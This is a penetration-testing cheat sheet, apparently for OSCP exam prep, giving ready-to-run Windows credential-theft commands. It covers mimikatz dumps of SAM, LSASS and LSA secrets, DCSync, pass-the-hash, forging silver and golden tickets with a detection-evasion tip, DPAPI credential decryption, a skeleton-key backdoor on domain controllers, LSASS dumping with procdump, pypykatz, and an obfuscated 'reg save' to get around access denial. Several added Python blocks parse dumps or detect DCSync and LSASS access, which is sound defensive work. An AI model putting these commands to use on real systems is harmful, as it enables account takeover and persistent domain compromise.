Windows tool that extracts password hashes from the memory of the Local Security Authority Subsystem Service (LSASS) process, where they are cached.
Officially allowed during the exam according to the OSCP Exam FAQ.
Windows XP
For older versions of Windows (XP, Server 2003), use pwdump, fgdump, and Windows Credential Editor (wce).
Fgdump
Copy fgdump from Kali to target.
/usr/share/windows-resources/binaries/fgdump/fgdump.exe
.\fgdump.exe
Dump registry
Dump the registry, then transfer to Kali.
If you get "Access denied", try bypassing it using tricks like this:
r^eg sa""ve HKL""M\S""YS""TEM S""YS""TEM
reg.exe save hklm\sam sam.save
reg.exe save hklm\security security.save
reg.exe save hklm\system system.save
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
Download
Download an older version if you get errors.
Or try the 32-bit version (even on x64 architecture)…
cp /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe /home/kali/share/mimikatz-win32.exe
Usage
Requires an administrative command prompt.
- privilege::debug: enable the SeDebugPrivilege access right required to tamper with another process
- token::elevate: elevate the security token from high integrity (administrator) to SYSTEM integrity for all users currently logged into the machine (they could be administrators of other machines)
Dump the SAM database
mimikatz.exe
privilege::debug
token::elevate
lsadump::sam
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit > \\tsclient\myshare\mimi_lsadump_sam.txt
Dump password hashes of logged in users
A MUST!!!
If error: "mimikatz # ERROR kuhl_m_sekurlsa_acquireLSA ; Key import", use the older version of mimikatz (see top of page).
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > \\tsclient\myshare\mimi_logonpasswords.txt
grep -E "User Name|NTLM" mimi_logonpasswords.txt
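The grep above only lists the raw "User Name" and "NTLM" lines. As an added example (not part of the original page), the parser below reads the same sekurlsa::logonpasswords output block by block, pairs each logon session's domain and user with the NTLM hash from its msv section, and de-duplicates across sessions, which is what an assessment report or an incident responder scoping a credential reset actually needs. The sample dump is constructed with placeholder all-zero and all-one hashes.

```python
import re
from collections import OrderedDict

# Constructed sample in the layout mimikatz prints: one block per logon
# session, with placeholder hashes instead of real ones.
SAMPLE_DUMP = """\
Authentication Id : 0 ; 203741 (00000000:00031bdd)
Session           : Interactive from 1
User Name         : jdoe
Domain            : EXAMPLE
Logon Server      : DC01
SID               : S-1-5-21-1111111111-2222222222-3333333333-1105
\tmsv :
\t [00000003] Primary
\t * Username   : jdoe
\t * Domain     : EXAMPLE
\t * NTLM       : 00000000000000000000000000000000
\t * SHA1       : 0000000000000000000000000000000000000000
\twdigest :
\t * Username   : jdoe
\t * Domain     : EXAMPLE
\t * Password   : (null)

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WS01$
Domain            : EXAMPLE
Logon Server      : (null)
SID               : S-1-5-20
\tmsv :
\t [00000003] Primary
\t * Username   : WS01$
\t * Domain     : EXAMPLE
\t * NTLM       : 11111111111111111111111111111111

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WS01$
Domain            : EXAMPLE
Logon Server      : (null)
SID               : S-1-5-18
\tmsv :
\t [00000003] Primary
\t * Username   : WS01$
\t * Domain     : EXAMPLE
\t * NTLM       : 11111111111111111111111111111111
"""

BLOCK_START = "Authentication Id :"
# Matches both the block header lines ("User Name", "Domain") and the
# indented "* NTLM" line inside the msv section; "* Username" is deliberately
# not matched so the header value is the one kept.
FIELD = re.compile(r"^\s*\*?\s*(User Name|Domain|NTLM|Session)\s*:\s*(.*?)\s*$")


def parse_logonpasswords(text):
    """Return one dict per logon session that carries an msv NTLM hash."""
    sessions = []
    current = None
    for line in text.splitlines():
        if line.startswith(BLOCK_START):
            current = {}
            sessions.append(current)
            continue
        if current is None:
            continue
        m = FIELD.match(line)
        if m:
            # setdefault keeps the first value seen in the block, i.e. the
            # header User Name/Domain and the msv (primary) NTLM hash.
            current.setdefault(m.group(1), m.group(2))
    return [s for s in sessions if s.get("NTLM") not in (None, "(null)")]


def exposed_accounts(text):
    """Map DOMAIN\\user -> NTLM hash, de-duplicated across logon sessions."""
    found = OrderedDict()
    for s in parse_logonpasswords(text):
        found.setdefault(f"{s['Domain']}\\{s['User Name']}", s["NTLM"])
    return found


if __name__ == "__main__":
    for account, ntlm in exposed_accounts(SAMPLE_DUMP).items():
        print(f"{account:<24} {ntlm}")
```

Every account that appears in this list had its hash resident in LSASS on that host, so after an incident each of them needs a password change (and, for computer accounts, a machine password reset) regardless of whether the attacker also cracked the hash.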
Dump password hashes (Run as Administrator)
Useful on the DC!
mimikatz.exe
privilege::debug
lsadump::lsa /patch
mimikatz.exe "privilege::debug" "lsadump::lsa /patch" exit > \\tsclient\myshare\mimi_lsadump.txt
Dump all password hashes
Capture hashes remotely from a workstation. Use for persistence in AD. Log in as a user that is in the Domain Admins group on a workstation.
lsadump::dcsync /user:Administrator
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:Administrator" exit > \\tsclient\myshare\mimi_lsadump_dcsync.txt
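DCSync works by asking a domain controller to replicate account secrets, which the DC audits as Event ID 4662 with the replication control-access rights in the Properties field. As an added example (not part of the original page), the check below flags such events when the requesting account is not one of the accounts expected to replicate. The two extended-right GUIDs are the standard Active Directory values for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All; the list of replication accounts and the sample events are assumptions constructed for the example.

```python
import re

# Standard AD extended-right GUIDs that a replication (DCSync) request needs.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

# Assumed inventory: the domain controllers' computer accounts. A real
# deployment would also allowlist any legitimate replication service account.
REPLICATION_ACCOUNTS = {"DC01$", "DC02$"}

# Constructed Security-log records reduced to the fields the check needs.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "EXAMPLE", "SubjectUserName": "DC02$",
     "Properties": "Control Access\n\t\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "EXAMPLE", "SubjectUserName": "jdoe",
     "Properties": "Control Access\n\t\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectDomainName": "EXAMPLE", "SubjectUserName": "svc_backup",
     "Properties": "Read Property\n\t\t{bf967a86-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectDomainName": "EXAMPLE", "SubjectUserName": "jdoe",
     "Properties": ""},
]


def is_dcsync_request(event, replication_accounts=REPLICATION_ACCOUNTS):
    """True when an account outside the replication allowlist exercised a
    replication right (either GUID is enough to warrant a look)."""
    if event.get("EventID") != 4662:
        return False
    rights = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    if not rights & REPLICATION_RIGHTS:
        return False
    trusted = {a.upper() for a in replication_accounts}
    return event.get("SubjectUserName", "").upper() not in trusted


def find_dcsync_requests(events, replication_accounts=REPLICATION_ACCOUNTS):
    """Return DOMAIN\\user for every event that looks like a DCSync request."""
    return [f"{e['SubjectDomainName']}\\{e['SubjectUserName']}"
            for e in events if is_dcsync_request(e, replication_accounts)]


if __name__ == "__main__":
    for who in find_dcsync_requests(SAMPLE_EVENTS):
        print("replication right used by non-DC account:", who)
```

Event 4662 is only generated when the "Directory Service Access" audit subcategory is enabled on the DCs, so the check is worthless until that policy is in place; the replication allowlist is what keeps normal DC-to-DC replication out of the alert stream.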
Dump passwords of logged in users (from LSASS)
mimikatz.exe
privilege::debug
inject::process lsass.exe sekurlsa.dll
@getLogonPasswords
Dump user tickets stored in memory
mimikatz.exe
privilege::debug
sekurlsa::tickets
mimikatz.exe "privilege::debug" "sekurlsa::tickets" exit > \\tsclient\myshare\mimi_tickets.txt
Download service tickets in memory to file
No need to be an administrator 😉
kerberos::list /export
Overpass the Hash
See Overpass the Hash.
sekurlsa::pth /user:john /domain:example.com /ntlm:a...123 /run:PowerShell.exe
Silver Tickets
Domain SID
Get the SID of the current user and remove the last 4 digits to get the domain SID.
whoami /user
Generate the RC4 hash from password
If the password is known and the RC4 hash was not already obtained.
mimikatz.exe
kerberos::hash /password:MyBadPassword
Generate the Silver Ticket
The command says "golden" but it is a silver ticket. /ptt will load the ticket in memory.
mimikatz.exe
privilege::debug
kerberos::purge
kerberos::list
kerberos::golden /user:fakeuser /domain:example.com /sid:S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx /target:<domain from SPN> /service:HTTP /rc4:<password RC4 hash> /ptt
kerberos::list
Golden Tickets
Use this technique for persistence in Active Directory. Requires:
- Password hash of the krbtgt account
- SID of the domain
Domain SID
Get the SID of the current user and remove the last 4 digits to get the domain SID.
whoami /user
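The "remove the last digits" step in this section and in the Silver Tickets section above is the same operation: a domain account SID has the form S-1-5-21-<three sub-authorities>-<RID>, and the domain SID is everything before the final RID. As an added example (not part of the original page), the helper below pulls the SID out of `whoami /user` output and strips the whole trailing RID component, so it gives the same answer as the page's "last 4 digits" rule for a four-digit RID and also handles shorter RIDs such as the built-in Administrator's 500. The sample output is constructed.

```python
import re

# Constructed sample of what `whoami /user` prints for a domain account.
WHOAMI_USER_OUTPUT = """\

USER INFORMATION
----------------

User Name    SID
============ =============================================
example\\jdoe S-1-5-21-1111111111-2222222222-3333333333-1105
"""

# Domain account SIDs: S-1-5-21, three sub-authorities, then the RID.
DOMAIN_ACCOUNT_SID = re.compile(r"\b(S-1-5-21(?:-\d+){3})-(\d+)\b")


def split_account_sid(sid):
    """Return (domain SID, RID); raise for well-known SIDs such as S-1-5-18."""
    m = DOMAIN_ACCOUNT_SID.fullmatch(sid.strip())
    if not m:
        raise ValueError(f"not a domain account SID: {sid!r}")
    return m.group(1), int(m.group(2))


def domain_sid_from_whoami(output):
    """Find the account SID in `whoami /user` output and drop its RID."""
    m = DOMAIN_ACCOUNT_SID.search(output)
    if not m:
        raise ValueError("no domain account SID found (local or built-in account?)")
    return m.group(1)


if __name__ == "__main__":
    print(domain_sid_from_whoami(WHOAMI_USER_OUTPUT))
```

If `whoami /user` was run as a local account (SID S-1-5-21-... of the local machine) the function returns the machine's SID, not the domain's, so run it in a domain logon session.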
Password hash of krbtgt
Run as Administrator on the domain controller.
mimikatz.exe
privilege::debug
lsadump::lsa /patch
Generate the Golden Ticket
/ptt will load the ticket in memory. When trying to evade detection, use the name and ID of an existing system administrator.
mimikatz.exe
privilege::debug
kerberos::purge
kerberos::list
kerberos::golden /user:<fakeuser> /domain:example.com /sid:S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx /krbtgt:<NTLM hash> /ptt
kerberos::list
Use the Golden Ticket
Use PsExec from Sysinternals. Do NOT use the IP address.
psexec.exe \\<domain controller hostname> cmd.exe
Windows Credential Manager
Users may save RDP connection details for quick authentication. These credentials are stored in encrypted form in the Windows Credential Manager using the Data Protection API. See Dumping RDP Credentials.
Find all files containing credentials
dir /a C:\Users\<USERNAME>\AppData\Local\Microsoft\Credentials
File name looks like "0ABC123ABC123ABC123ABC123ABC123".
Start Mimikatz
mimikatz.exe
For each file previously found, take note of guidMasterKey
Take note of the guidMasterKey for each file. Looks like "{a0a0a0a0-b1b1-c2c2-d3d3-e4e4e4e4e4e4}".
dpapi::cred /in:C:\Users\<USERNAME>\AppData\Local\Microsoft\Credentials\<FILENAME>
List all master keys
Find the masterkey with GUID=guidMasterKey
sekurlsa::dpapi
Decrypt using the Master Key
dpapi::cred /in:C:\Users\<USERNAME>\AppData\Local\Microsoft\Credentials\<FILENAME> /masterkey:<MASTER KEY>
The information should be decrypted.
Skeleton Key Attack
Used for AD persistence. Runs in memory, so lost after reboot.
- Unlocking All the Doors to Active Directory with the Skeleton Key Attack
- Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest
Run on every Domain Controller
The attacker must have Domain Admin rights.
mimikatz.exe
privilege::debug
misc::skeleton
mimikatz.exe "privilege::debug" "misc::skeleton" exit
After that, you can authenticate as any user with the default password of Mimikatz.
net use x: \\<DC>\admin$ /user:<real username> mimikatz
net use \\<DC>\c$ mimikatz /user:<real username>\Administrator
runas /user:<domain>\<real username> C:\Windows\System32\cmd.exe
Other options to dump credentials
Option 1 – Task Manager
- Open Task Manager
- Under Processes, right-click on lsass.exe
- Select Create Dump File
- File will be created in C:\Users\Administrator\AppData\Local\Temp\lsass.DMP
Option 2 – Procdump from Sysinternals
- Open Task Manager
- Under Processes, click on menu View->Select Columns and add the column PID
- Upload procdump.exe from Sysinternals
cmd.exe "Run as Administrator"
procdump.exe /ma -accepteula <lsass process ID>
procdump.exe /ma -accepteula 464
Will create file lsass.exe_YYMMDD_HHMMSS.dmp
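Whether the hashes are read live by sekurlsa::logonpasswords or taken from a dump produced by Task Manager or procdump, the tool has to open a handle to lsass.exe with memory-read access, and Sysmon records every such handle as Event ID 10 (ProcessAccess) with the source image and the granted access mask. As an added example (not part of the original page), the check below flags any non-allowlisted process whose granted access includes PROCESS_VM_READ on lsass.exe; the allowlist of legitimate readers and the sample events are assumptions constructed for the example.

```python
# Windows access-right bits relevant to reading another process's memory.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400

# Assumed allowlist of images that legitimately open lsass.exe on this build;
# tune it from a baseline of your own hosts.
LSASS_READERS_ALLOWLIST = {
    r"C:\Windows\System32\csrss.exe",
    r"C:\Windows\System32\wininit.exe",
    r"C:\Windows\System32\svchost.exe",
    r"C:\Program Files\Windows Defender\MsMpEng.exe",
}

# Constructed Sysmon Event ID 10 records reduced to the fields the check uses.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\Administrator\Desktop\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Users\jdoe\tool.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1fffff"},
]


def reads_lsass_memory(event, allowlist=LSASS_READERS_ALLOWLIST):
    """True for a ProcessAccess event where a non-allowlisted image obtained
    PROCESS_VM_READ on lsass.exe (0x1010 and 0x1fffff both qualify)."""
    if event.get("EventID") != 10:
        return False
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    mask = int(event.get("GrantedAccess", "0"), 16)   # Sysmon logs it as hex text
    if not mask & PROCESS_VM_READ:
        return False
    allowed = {a.lower() for a in allowlist}
    return event.get("SourceImage", "").lower() not in allowed


def suspicious_lsass_access(events, allowlist=LSASS_READERS_ALLOWLIST):
    """Return (source image, granted access) for every flagged event."""
    return [(e["SourceImage"], e["GrantedAccess"])
            for e in events if reads_lsass_memory(e, allowlist)]


if __name__ == "__main__":
    for image, mask in suspicious_lsass_access(SAMPLE_EVENTS):
        print(f"lsass memory read by {image} (GrantedAccess={mask})")
```

Matching on the access bits rather than on a fixed list of masks catches the Task Manager and procdump full-access handles (0x1fffff) as well as the narrower 0x1010 handle, at the cost of needing a real allowlist; on hosts where LSASS runs as a protected process (RunAsPPL) or with Credential Guard, these reads fail in the first place and the event is the only trace left.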
Read the .DMP file
Credentials can be retrieved from the .DMP file with Mimikatz. The first line loads the memory dump, and the second one retrieves the secrets.
mimikatz.exe
sekurlsa::minidump lsass.DMP
sekurlsa::logonpasswords
exit
Pypykatz
NOT TESTED
Python implementation of Mimikatz.
On the victim machine
Get LSASS credentials (+ Kerberos tickets)
pypykatz live lsa
pypykatz live lsa -o <output_dir> -k <kerberos_dir>
List users prone to SPNRoast and ASRepRoast
pypykatz live ldap spn
pypykatz live ldap asrep
List all tokens
pypykatz live token list
Spawn a SYSTEM shell
pypykatz live process create
Print registry credentials
pypykatz live registry
List all users that have ever logged on to the target
pypykatz live users list
Current user in domain:username:SID format
pypykatz live users whoami
Offline – on Kali or any other machine
# Parse mimidump file
pypykatz lsa minidump <input_file>
# List domain users prone to SPNRoast or ASRepRoast
pypykatz ldap TEST/victim/pw:@10.10.10.2 spn
pypykatz ldap TEST/victim/pw:@10.10.10.2 asrep
# Decrypt gpp-pass
pypykatz gppass <base64_enc_password>